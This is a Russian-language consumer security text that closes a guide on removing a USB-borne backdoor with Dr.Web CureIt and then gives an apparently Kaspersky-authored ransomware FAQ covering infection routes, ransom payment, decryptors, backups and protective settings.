Лечащая утилита обнаружила 8 угроз BackDoor.IRC.NgrBot.42. Обратите внимание, что в Лаборатории Касперского троян числился как Trojan.Win32.Inject. В этом нет ничего удивительного, так как разные разработчики по разному называют своих «подопечных».
Обнаружено 8 угроз BackDoor.IRC.NgrBot.42
Надо заметить, что утилита явно подстраховалась и все ярлыки, ведущие к удаленному ранее вирусу, занесла в список угроз. Нам же осталось нажать на кнопку Обезвредить .
После того, как будут обезврежены найденные угрозы, можно открыть флешку и оценить результат работы. Утилита Dr. Web CureIt отработала на все 100%: угрозы обезврежены, а файлы восстановлены.
Утилита удалила на флешке ярлыки и восстановила файлы
Не так страшен чёрт, как его малюют. Обладая определенными знаниями, во многих случаях, можно справиться с вирусами не потеряв своих данных. Главное — не суетиться и не делать резких движений.
Не забывайте о том, что на компьютере или ноутбуке обязательно должна быть установлена антивирусная программа.
Этот текст может сэкономить вам где-то $300. Примерно столько потребует в качестве выкупа средний троян-шифровальщик. А в «заложниках» у него окажутся ваши личные фотографии, документы и другие файлы с зараженного компьютера.
Подцепить такую заразу очень просто. Для этого вовсе не обязательно часами лазить по сомнительным порносайтам или открывать все файлы подряд из почтовой папки «Спам». Даже не делая ничего предосудительного в Интернете, вы все равно рискуете. Как? Читайте дальше.
Это зловредные программы, которые требуют выкуп за восстановление работоспособности компьютера или смартфона. Они делятся на два типа.
Первая группа этих программ шифрует файлы так, что ими нельзя воспользоваться, пока не расшифруешь. А за расшифровку они требуют деньги. Таких вымогателей называют шифровальщиками (cryptor, crypto ransomware) — и они самые опасные.
Другая группа зловредов — блокировщики (blocker) — просто блокирует нормальную работу компьютера или смартфона. От них вылечиться обычно проще.
По-разному. Бывают «скромные» вымогатели, которым достаточно и $30. А бывает, что сумма измеряется десятками тысяч долларов. Большой выкуп обычно требуют с компаний и других состоятельных клиентов — их часто заражают целенаправленно, в «ручном режиме».
4. Зашифрованные файлы можно восстановить без выкупа?
Иногда да, но далеко не всегда. Большинство современных шифровальщиков используют стойкие криптоалгоритмы. Это значит, что расшифровкой можно безуспешно заниматься долгие годы.
Порой злоумышленники допускают ошибки в реализации шифрования, или же правоохранительным органам удается изъять сервера преступников с криптографическими ключами. В этом случае у экспертов получается создать утилиту для расшифровки.
Еще один шифровальщик побежден! Все, кто пострадал от Shade, могут восстановить файлы: https://t.co/yPT3Cbocjn pic.twitter.com/MVDXFRABkt
— Kaspersky Lab (@Kaspersky_ru) July 25, 2016
Обычно с помощью криптовалюты — биткойнов. Это такая хитрая электронная наличность, которую невозможно подделать. История транзакций видна всем, а вот отследить, кто хозяин кошелька, очень сложно. Именно из-за этого злоумышленники и предпочитают биткойны. Меньше шансов, что застукает полиция.
Если вы все еще не понимаете что такое биткоин и блокчейн и как они работают, вам сюда: https://t.co/ItuN2S56ag pic.twitter.com/Zj1FLgk35j
— Kaspersky Lab (@Kaspersky_ru) August 12, 2016
Самый распространенный способ — через электронную почту. Вымогатели обычно прикидываются каким-нибудь полезным вложением — срочным счетом на оплату, интересной статьей или бесплатной программой. Открыв такое вложение, вы запускаете на компьютер зловреда.
Можно подцепить вымогателя и просто просматривая интернет-сайты, даже не запуская при этом никаких файлов. Для захвата контроля над системой вымогатели используют ошибки в коде операционной системы, браузера или какой-нибудь другой установленной на компьютере программы. Поэтому очень важно не забывать устанавливать обновления ПО и операционной системы (кстати, эту задачу можно поручить Kaspersky Internet Security или Kaspersky Total Security — последние версии умеют это делать автоматически).
Некоторые вымогатели умеют распространяться с помощью локальной сети. Стоит такому трояну попасть на один компьютер, как он попытается заразить все остальные машины в вашей домашней сети или локальной сети организации. Но это совсем экзотический вариант.
Разумеется, есть и более тривиальные сценарии заражения. Скачал торрент, запустил файл… и все, приехали.
Самая подозрительная категория — это исполняемые файлы (расширения EXE или SCR), а также скрипты Visual Basic или JavaScript (расширения VBS и JS). Нередко для маскировки эти файлы упакованы в архивы (ZIP или RAR).
10 правил, которые помогут вам защитить свои файлы от заражения трояном-шифровальщиком: https://t.co/fTQ13YDoKp pic.twitter.com/OE5ik48iRo
— Kaspersky Lab (@Kaspersky_ru) November 30, 2015
Вторая категория повышенной опасности — документы MS Office (DOC, DOCX, XLS, XLSX, PPT и тому подобные). Опасность в них представляют встроенные программы, написанные с помощью макрокоманд MS Office. Если при открытии офисного файла вас просят разрешить выполнение макрокоманд, три раза подумайте, стоит ли это делать.
Опасность несут также файлы ярлыков (расширение LNK). Windows может демонстрировать их с любой иконкой, что в сочетании с «безопасно» выглядящим именем позволяет усыпить бдительность.
Важный момент: Windows по умолчанию скрывает расширения известных системе типов файлов. Так что, встретив файл с именем Important_info.txt, не спешите по нему кликать, полагаясь на безопасность текстового содержимого: «txt» может оказаться частью имени, а расширение у файла при этом может быть совсем другим.
8. Если не кликать по чему попало и не лазить по интернет-помойкам, то не заразишься?
К сожалению, шанс подцепить вымогателя есть даже у самых разумных пользователей. Например, в процессе чтения новостей на сайте крупного «белого и пушистого» СМИ.
Конечно, само издание вирусы распространять не станет. Как правило, такие заражения происходят через систему обмена рекламными баннерами, к которой удалось подключиться злоумышленникам. И если вы окажетесь на сайте именно в этот момент, а на вашем компьютере есть незакрытая программная уязвимость, но нет хорошего антивируса… считайте, что вам не повезло.
Есть. Например, пользователей Mac успешно атаковал троянец-вымогатель KeRanger, сумевший вклиниться в официальную сборку популярного торрент-клиента Transmission.
Наши эксперты считают, что со временем вымогателей для устройств Apple будет все больше и больше. Более того, поскольку сами устройства дорогие, то злоумышленники не постесняются требовать с их владельцев более солидные суммы выкупа.
Есть вымогатели и для Linux. В общем, ни одна из популярных систем от этой заразы не избавлена.
На Маках вирусов нет, говорите? Вот, пожалуйста, свежий шифровальщик-вымогатель: https://t.co/CrchpwfN2f pic.twitter.com/BwdvbmNuqi
— Kaspersky Lab (@Kaspersky_ru) March 14, 2016
Еще как страшно. Для аппаратов на Android есть как шифровальщики, так и блокировщики. Последние на смартфонах даже более распространены. На компьютере от них можно избавиться, просто переставив жесткий диск в другой системный блок и удалив зловреда, а вот из смартфона память так просто не достанешь. Так что антивирус на смартфоне — это совсем не блажь.
Вот разве что для iPhone и iPad их пока и нет. Ну или почти нет — есть неприятные веб-страницы, которые отказываются закрываться. Однако их можно «убить», зайдя в настройки и удалив все данные о веб-активности Safari. Стоит учитывать, что вашему iPhone вымогатели не грозят, только если на нем никто не делал джейлбрейк. Если же iPhone взломан, то и для зловредов дорога широко открыта.
Кстати, в ближайшем будущем, видимо, появятся вымогатели для iPhone без джейлбрейка, как появятся они и для Интернета вещей. Ведь за заблокированный телевизор или «умный» холодильник с жертвы наверняка можно потребовать кругленькую сумму.
Шифровальщик непременно расскажет вам об этом сам. Вот так:
А блокировщики делают это как-нибудь так:
13. Какие бывают наиболее примечательные вымогатели?
Самых распространенных назвать довольно сложно, они каждый месяц новые. Из недавних, но запомнившихся можем назвать, например, «Петю» (Petya), который шифрует весь жесткий диск целиком. Или СryptXXX, который довольно активно свирепствует и сейчас и от которого мы дважды изобретали «лекарство». Ну и TeslaCrypt — чемпиона по распространенности за первые четыре месяца этого года, от которого сами его создатели неожиданно опубликовали мастер-ключ.
От троянов-блокировщиков хорошо помогает бесплатная программа Kaspersky WindowsUnlocker.
С шифровальщиками бороться сложнее. Сначала нужно ликвидировать заразу — для этого лучше всего использовать антивирус. Если нет платного, то можно скачать бесплатную пробную версию с ограниченным сроком действия, для лечения этого будет достаточно.
Следующий этап — восстановление зашифрованных файлов.
Если есть резервная копия, то проще всего восстановить файлы из нее.
Если резервной копии нет, можно попробовать расшифровать файлы с помощью специальных утилит — декрипторов. Все бесплатные декрипторы, созданные «Лабораторией Касперского», можно найти на сайте Noransom.kaspersky.com.
Декрипторы выпускают и другие антивирусные компании. Только не скачивайте такие программы с сомнительных сайтов — запросто подхватите еще какую-нибудь заразу. Если подходящей утилиты нет, то остается единственный способ — заплатить мошенникам и получить от них ключ для расшифровки. Но не советуем это делать.
Во-первых, нет никаких гарантий, что файлы к вам вернутся, — верить киберпреступникам на слово нельзя. Например, вымогатель Ranscam в принципе не подразумевает возможности восстановить файлы — он их сразу же удаляет безвозвратно, а потом требует выкуп якобы за восстановление, которое уже невозможно.
Во-вторых, не стоит поддерживать преступный бизнес.
Вирусописатели быстро реагируют на появление утилит для расшифровки, выпуская новые версии зловредов. Это такая постоянная игра в кошки-мышки. Так что, увы, здесь тоже никаких гарантий.
17. Если вовремя заметил угрозу, можно что-то сделать?
В теории можно успеть вовремя выключить компьютер, вынуть из него жесткий диск, вставить в другой компьютер и с помощью антивируса избавиться от шифровальщика. Но на практике вовремя заметить появление шифровальщика очень сложно или вовсе невозможно — они практически никак не проявляют себя, пока не зашифруют все интересовавшие их файлы, и только тогда выводят страницу с требованием выкупа.
Скорее всего, да, но 100% защиты они все равно не дают. Представьте ситуацию: вы настроили на компьютере своей бабушки создание автоматических резервных копий раз в три дня. На компьютер проник шифровальщик, все зашифровал, но бабушка не поняла его грозных требований. Через неделю вы приезжаете и… в бэкапах только зашифрованные файлы. Тем не менее делать бэкапы все равно очень важно и нужно, но ограничиваться этим не стоит.
В большинстве случаев — да, хотя антивирусы бывают разные. Антивирусные решения «Лаборатории Касперского», согласно независимым тестам (а только независимым тестам от крупных солидных учреждений и стоит в принципе доверять ), защищают лучше большинства других. Однако ни один антивирус не способен блокировать все угрозы на 100%.
Во многом это зависит от новизны зловреда. Если его сигнатуры еще не добавлены в антивирусные базы, то поймать такого трояна можно, только на лету анализируя его действия. Пытается вредить — значит, сразу блокируем.
В наших продуктах этим занимается модуль под названием «Мониторинг активности» (System Watcher). Если он, например, замечает попытку массового шифрования файлов, то блокирует опасный процесс и откатывает обратно сделанные в файлах изменения. Отключать этот компонент ни в коем случае не стоит.
20. Можно что-то настроить на компьютере, чтобы защититься надежнее?
а) Во-первых, обязательно поставьте антивирус. Но мы об этом уже говорили.
б) В браузерах можно отключить выполнение скриптов, поскольку их часто используют злоумышленники. Подробности о том, как лучше настроить браузеры Chrome и Firefox, можно прочитать на нашем блоге.
в) Включить показ расширений файлов в «Проводнике» Windows.
г) Windows обычно помечает опасные файлы скриптов VBS и JS иконкой текстового документа, что сбивает неопытных пользователей с толку. Проблему можно решить, назначив программу «Блокнот» (Notepad) приложением по умолчанию для расширений VBS и JS.
д) Можно включить в антивирусе функцию «Режим безопасных программ» (Trusted Applications Mode ), запрещающую установку и исполнение любых программ, которые не внесены в «белый список». По умолчанию она не включена, так как требует некоторого времени для настройки. Но это действительно полезная штука, особенно если пользователи у компьютера не самые продвинутые и есть риск, что они случайно запустят что-нибудь не то.
Оставить комментарий